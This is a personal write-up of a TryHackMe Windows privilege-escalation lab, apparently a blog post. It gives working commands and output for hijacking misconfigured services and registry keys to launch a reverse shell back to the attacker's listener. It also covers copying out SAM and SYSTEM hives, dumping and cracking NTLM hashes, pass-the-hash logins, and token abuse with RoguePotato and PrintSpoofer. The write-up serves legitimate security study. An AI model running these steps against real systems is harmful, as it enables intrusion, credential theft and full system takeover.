Complete Windows Privilege Escalation…
Based on THM Winprivesc
For the past few months, I have been away from the field of information security, but I am now back and ready to continue my learning journey. I have decided to create a write-up for future studies to help me regain my knowledge in this area and keep myself updated.
I’ve set some goals to keep myself in this field, one of which is to publish two writeups on Medium, the first of which is about WinPrivesc.
Let's GET into IT……
Service Exploits
* Insecure service Permissions
* Unquoted Service Path
* Weak Registry Permissions
* Insecure Service Executables
**Insecure Service Permissions**
Insecure service permission is a security weakness where the settings for a service running on a system are not properly configured, making the system vulnerable to attacks.
winPEASany.exe
daclsvc(DACL Service)[C:\Program Files\DACL Service\daclservice.exe] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFilesAs you see above winpeas shows DACLsvc services were misconfigured so that we can elevate our privileges.
In order to do that first create a reverse.exe and change the binpath of daclservies with the reverse.exe but before that we must check that we have all this permission to change the service config.
use accesschk.exe to checking the listed permissions.
C:\PrivEsc>accesschk.exe /accepteula -vsqwc user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
AccessChk is a application to check access of files, keys, objects, processes or services.
-v = verbose
-s = recurse
-q = quit banner
-w = writeable access objects
-c = service name- SERVICE_QUERY_CONFIG: This permission allows the user to query the configuration of the service, such as its start type, error control, binary path name, and other service parameters.
- SERVICE_CHANGE_CONFIG: This permission allows the user to change the configuration of the service, such as changing its start type, binary path name, or dependencies.
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\PrivEsc>sc config daclsvc binpath="C:\PrivEsc\reverse.exe"
[SC] ChangeServiceConfig SUCCESS
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\PrivEsc\reverse.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\PrivEsc>net start daclsvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
Check the netcat was fired up...
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.179.130] 49927
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>**Unquoted Service Path**
Unquoted Service Path is a security weakness in Windows where the path to a running program or service is not properly enclosed in quotes. This can make it easier for attackers to launch malicious code or manipulate the service in a way that undermines the security of the system.
unquotedsvc(Unquoted Path Service)
[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detectedCheck the permissions to see if the built-in user has RW permissions or not.
C:\PrivEsc>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\AdministratorsThe “RW” next to “BUILTIN\Users” that the built-in Users group has both read and write access to the folder.
Now let’s copy reverse.exe to the following unquoted path. Then start the service.
C:\PrivEsc>copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.
C:\PrivEsc>net start unquotedsvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
Check NC>
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.179.130] 49845
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>**Weak Registry Permissions**
A weak registry permission issue with “regsvc.exe” can occur if the registry key associated with the registry service has weak permissions, allowing unauthorized users or applications to modify or delete its values.
Check the available permissions.
C:\PrivEsc>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESSThe “NT AUTHORITY\INTERACTIVE” account has full control of the registry key, with the ability to read and write to the key. this means that any user who is currently logged on to the system will have full control of the registry key.
C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: regsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Insecure Registry Service\insecureregistryservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Insecure Registry Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystemCan’t able to change the binpath because the current user does not have any necessary permissions.
C:\PrivEsc>Reg query hklm\System\CurrentControlSet\Services\regsvc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\regsvc
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ C:\Program Files\Insecure Registry Service\insecureregistryservice.exe
DisplayName REG_SZ Insecure Registry Service
ObjectName REG_SZ LocalSystem
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\regsvc\SecurityOverwrite the imagepath and point to the reverse.exe then start the service.
C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
The operation completed successfully.
C:\PrivEsc>net start regsvc
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.222.155] 49835
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>*Insecure Service Executables**
filepermsvc(File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
File Permissions: Everyone [AllAccess]Listed Permissions:
C:\PrivEsc>accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESS
RW BUILTIN\Users
FILE_ALL_ACCESSSafezone, All users have full read and write access. let do copy the reverse.exe to the filepermservice.exe
C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
1 file(s) copied.
C:\PrivEsc>net start filepermsvc
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.222.155] 49766
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\systemRegistry
* Autorun
* AlwaysInstallElevated
**Autorun**
The Autorun registry keys specify the actions that Windows should take when a removable media is inserted, such as launching a specific program or opening a file.
Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]
RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Check the permissions.
C:\PrivEsc>accesschk.exe /accepteula -qwvu "C:\Program Files\Autorun Program\program.exe"
C:\Program Files\Autorun Program\program.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESS
RW BUILTIN\Users
FILE_ALL_ACCESSUser has full access let copy the reverse.exe overwrite to program.exe.
C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
1 file(s) copied.Then shut down and do login with the last logged-on user “admin”.
**AlwaysInstallElevated**
The AlwaysInstallElevated policy feature is used to install an MSI package file with elevated (system) privileges.
When the value is set to 1, the Windows Installer service runs all installations with elevated privileges, regardless of the user’s permissions.
C:\Users\user>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1then execute the reverse.msi
C:\PrivEsc>msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 43
listening on [any] 43 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.88.30] 49831
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>Passwords
* Registry
* Saved Password
* SAM
**Registry**
The Windows registry is a database that stores configuration information and installed programs. sometimes it may store passwords in the registry.
Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /sPutty
reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”VNC
reg query “HKCU\Software\ORL\WinVNC3\Password”Windows autologin
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”SNMP
reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”
C:\Users\user>reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42
ProxyUsername REG_SZ admin
ProxyPassword REG_SZ password123The option /s is used to search for the specified value in all subkeys of the target key.
**Saved Passwords**
Two ways to retrieve the saved passwords winpeas and cmdkey.
Cmdkey is used to manage stored user credentials for network connections and remote servers and also lists the stored credentials.
C:\Users\user>cmdkey /list
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nfpgrklkitqatu
Local machine persistence
Target: Domain:interactive=WIN-QBA94KB3IOF\admin
Type: Domain Password
User: WIN-QBA94KB3IOF\admin
Winpeas
C:\PrivEsc>.\winPEASany.exe quiet cmd windowscreds
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nfpgrklkitqatu
Local machine persistence
Target: Domain:interactive=WIN-QBA94KB3IOF\admin
Type: Domain Password
User: WIN-QBA94KB3IOF\admin
C:\PrivEsc>runas /savedcred /user:admin C:\PrivEsc\reverse.exe
Attempting to start C:\PrivEsc\reverse.exe as user "WIN-QBA94KB3IOF\admin" ...
The above command uses the “runas” command with the “/savecred” option to start the program “C:\PrivEsc\reverse.exe” with the credentials of the user “admin”.
**SAM(Security Account Manager)**
In Windows, password hashes are stored in the Security Account Manager (SAM) database file, which is encrypted with a key stored in the SYSTEM file.
Lets copy those files..
C:\Windows\Repair>copy “C:\Windows\Repair\SAM” \\10.9.3.94\arun\
1 file(s) copied.C:\Windows\Repair>copy “C:\Windows\Repair\SYSTEM” \\10.9.3.94\arun\
1 file(s) copied.
Extract the hashes.
┌──(arun㉿kali)-[/usr/share/creddump7]
└─$ python pwdump.py ~/CTF/THM/win10priv/SYSTEM ~/CTF/THM/win10priv/SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
Crack using hashcat :
hashcat -a 0 -m 1000 admin_hash /usr/share/wordlists/rockyou.txt
hash cracked: password123
**Pass the hash**
Login using the hash without cracking it.
Psexec:
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ impacket-psexec admin@10.10.252.3 -hashes :a9fdfa03xxxxxxxxxxxxxc855dd74f0da
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.252.3.....
[*] Found writable share ADMIN$
[*] Uploading file NzXXijvd.exe
[*] Opening SVCManager on 10.10.252.3.....
[*] Creating service RcIU on 10.10.252.3.....
[*] Starting service RcIU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
pth-winexe:
┌──(arun㉿kali)-[~]
└─$ pth-winexe -U "admin%aad3b435b5140xxxxxxxxxxxxxxxxxxxxxxxxbc76dc855dd74f0da" //10.10.252.3 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>woami
woami
'woami' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>whoami
whoami
win-qba94kb3iof\admin
Evil-winrm:
┌──(arun㉿kali)-[~]
└─$ evil-winrm -i 10.10.252.3 -u admin -H a9fdfa038xxxxxxxxxxx55dd74f0da
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\admin\Documents> whoami
win-qba94kb3iof\adminScheduled Tasks
Task Scheduler is a built-in utility in Windows that allows you to schedule automated tasks to run at specific times or events.
The schtasks command is used to display a list of all the scheduled tasks on a Windows computer, along with their properties and setting.
schtasks /query /fo LIST /v
The Get-ScheduledTask” is a cmdlet in PowerShell that also allows you to retrieve information about the scheduled tasks on a Windows computer.
Get-ScheduledTask | ft TaskName,TaskPath,State
There is a script named CleanUp.ps1 that runs on the system every minute as a scheduled task.
Lets check the listed permissions using the tool accesschk.exe.
C:\PrivEsc>.\accesschk.exe /accepteula -quvw "C:\DevTools\CleanUp.ps1"
C:\DevTools\CleanUp.ps1
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
DELETE
SYNCHRONIZE
READ_CONTROL
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESSThe BUILTIN\Users group has write permissions. let append the reverse.exe to the CleanUp.ps1 script.
C:\PrivEsc>echo rev.exe >> “C:\DevTools\CleanUp.ps1”
Await the execution of the scheduled task to obtain the shell.
Insecure GUI applications
Insecure GUI applications refers to a vulnerability that allows an attacker to escalate their privileges on a Windows system by exploiting weaknesses in the graphical user interface (GUI) applications that are running with higher privileges.
C:\Users\user>tasklist /V | findstr mspaint.exe
cmd.exe 4552 RDP-Tcp#1 2 4,132 K Running WIN-QBA94KB3IOF\user 0:00:00 C:\Windows\system32\cmd.exe - findstr mspaint.exe
mspaint.exe 3904 RDP-Tcp#1 2 27,872 K Running WIN-QBA94KB3IOF\admin 0:00:00 Untitled - Paint
C:\Users\user>By taking advantage of the fact that MSPaint was executing with administrative privileges, it is possible to elevate one’s own privileges through MSPaint. To do this, open MSPaint and go to the ‘File’ menu. From there, select the ‘Open’ option. In the navigation bar, type in ‘C:\Windows\System32\cmd.exe’ to launch a Command Prompt window with administrative rights. This will allow the user to carry out actions with elevated privileges.
Startup apps
Windows Privilege Escalation through Startup Apps refers to the process of exploiting weaknesses in applications that are set to automatically start when the operating system boots.
The file path ”C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup” refers to the Windows Startup folder. This folder contains shortcuts to applications that are automatically launched when the system starts.
Let’s verify the folder permissions using Accesschk.exe to determine if Built-in users have access.
C:\PrivEsc>.\accesschk.exe /accepteula -qduv "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\admin
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
R Everyone
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
SYNCHRONIZE
READ_CONTROLThe Built-in Users group has full access rights to the folder.
Add the “reverse.exe” file to the “Startup” folder.
C:\PrivEsc>copy reverse.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\rev.exe"
1 file(s) copied.Restart the system to execute the “reverse.exe” file with elevated privileges.
┌──(arun㉿kali)-[~]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.175.166] 49864
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
win-qba94kb3iof\adminStep 2:
Create a startup script and save it to the startup directory. Upon execution, a shell startup shortcut will be created. After restarting the system and relogging in as an admin user, the shell will be triggered.
C:\PrivEsc>type CreateShortcut.vbs
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save
C:\PrivEsc>cscript C:\PrivEsc\CreateShortcut.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
Token Impersonation
Token impersonation is a method in which a Windows local administrator can gain unauthorized access to another user’s security credentials, allowing them to impersonate and perform actions as if they were that user.
RoguePotato
Welcome to potato family there are lot of potatoes to escalate the privileges.
If the machine is >= Windows 10 1809 & Windows Server 2019 — Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 — Try Juicy Potato
https://github.com/antonioCoco/RoguePotato
This requires the current account to have the ability to impersonate security tokens, which are typically granted to service accounts but not to user-level accounts. Unfortunately, our current account does not possess this capability.
C:\PrivEsc>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledIn our case, even the admin account doesn’t have SeImpersonatePrivilege.
Let's do first get a reverse shell as a local service account using the tools PSExec64.exe
PsExec is a command-line tool that allows you to run processes on remote systems and redirect console output to the local system.
C:\Windows\system32>C:\PrivEsc\PSExec64.exe -i -u “nt authority\local service” C:\PrivEsc\reverse.exe
PsExec v2.2 — Execute processes remotely
Copyright © 2001–2016 Mark Russinovich
Sysinternals — www.sysinternals.com
This command essentially allows the execution of the reverse.exe file on the remote system as the “nt authority\local service” user.
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.198.189] 49756
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\local service
C:\Windows\system32>
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledNow on this shell, we have SeImpersonatePrivilege enabled. Let's use RoguePotato to exploit. Quickly set up the redirector port forwarder on kali machine and the machine port must be 135 then it will redirect back to TCP port 9999.
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.198.189:9999
This command forwards service between two IP addresses and ports. It listens for incoming connections on port 135 on the local machine and forwards them to TCP port 9999.
Now fire up the nc listener then run RoguePotato.
C:\PrivEsc>RoguePotato.exe -r 10.9.3.94 -e "C:\PrivEsc\reverse.exe" -l 9999
RoguePotato.exe -r 10.9.3.94 -e "C:\PrivEsc\reverse.exe" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] IStoragetrigger written:100 bytes
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: C:\PrivEsc\reverse.exe
[+] RoguePotato gave you the SYSTEM powerz :D
C:\PrivEsc>
---------------------------------------------------
┌──(arun㉿kali)-[~]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.198.189] 49814
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\PrivEsc>whoami
whoami
nt authority\system
C:\PrivEsc>Hmmmm…Potatoes are really sweet.
PrintSpoofer
Both PrintSpoofer and RoguePotato are the same to elevate privileges using “SeImpersonatePrivilege”.
C:\PrivEsc>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Fire up your netcat listener and run “PrintSpoofer.exe” on the local service shell.
C:\PrivEsc>C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
-----------------------------------------
┌──(arun㉿kali)-[~]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.198.189] 49958
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Dllhijacking
DLL hijacking is a type of attack that takes advantage of misconfigured applications in Windows. The attacker tricks the application into loading a malicious DLL instead of the intended DLL, allowing the attacker to execute arbitrary code with the same privileges as the application.
C:\Users\TCM\Desktop\.\winPEAS64.exe
dllsvc(DLL Hijack Service) “C:\Program Files\DLL Hijack Service\dllhijackservice.exe” — Manual — Running
Open procmon.exe follow the steps:
- In procmon, select “filter”. From the left-most drop down menu, select ‘Process Name’.
* In the input box on the same line type: dllhijackservice.exe
* Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
* Next, select from the left-most drop down menu ‘Result’.
* In the input box on the same line type: NAME NOT FOUND
* Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
* Open command prompt and type: sc start dllsvc
* Scroll to the bottom of the window. One of the highlighted results shows
That the service tried to execute ‘C:\Temp\hijackme.dll’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location.
Verify the user’s permissions on the Temp directory to determine if access to the folder is granted.
Thank you.
References
https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
https://medium.com/securebit/understanding-impersonation-via-access-tokens-5e3e5946adb9
https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html
https://jlajara.gitlab.io/Potatoes_Windows_Privesc#roguePotato
hey, I loved the potatoes…
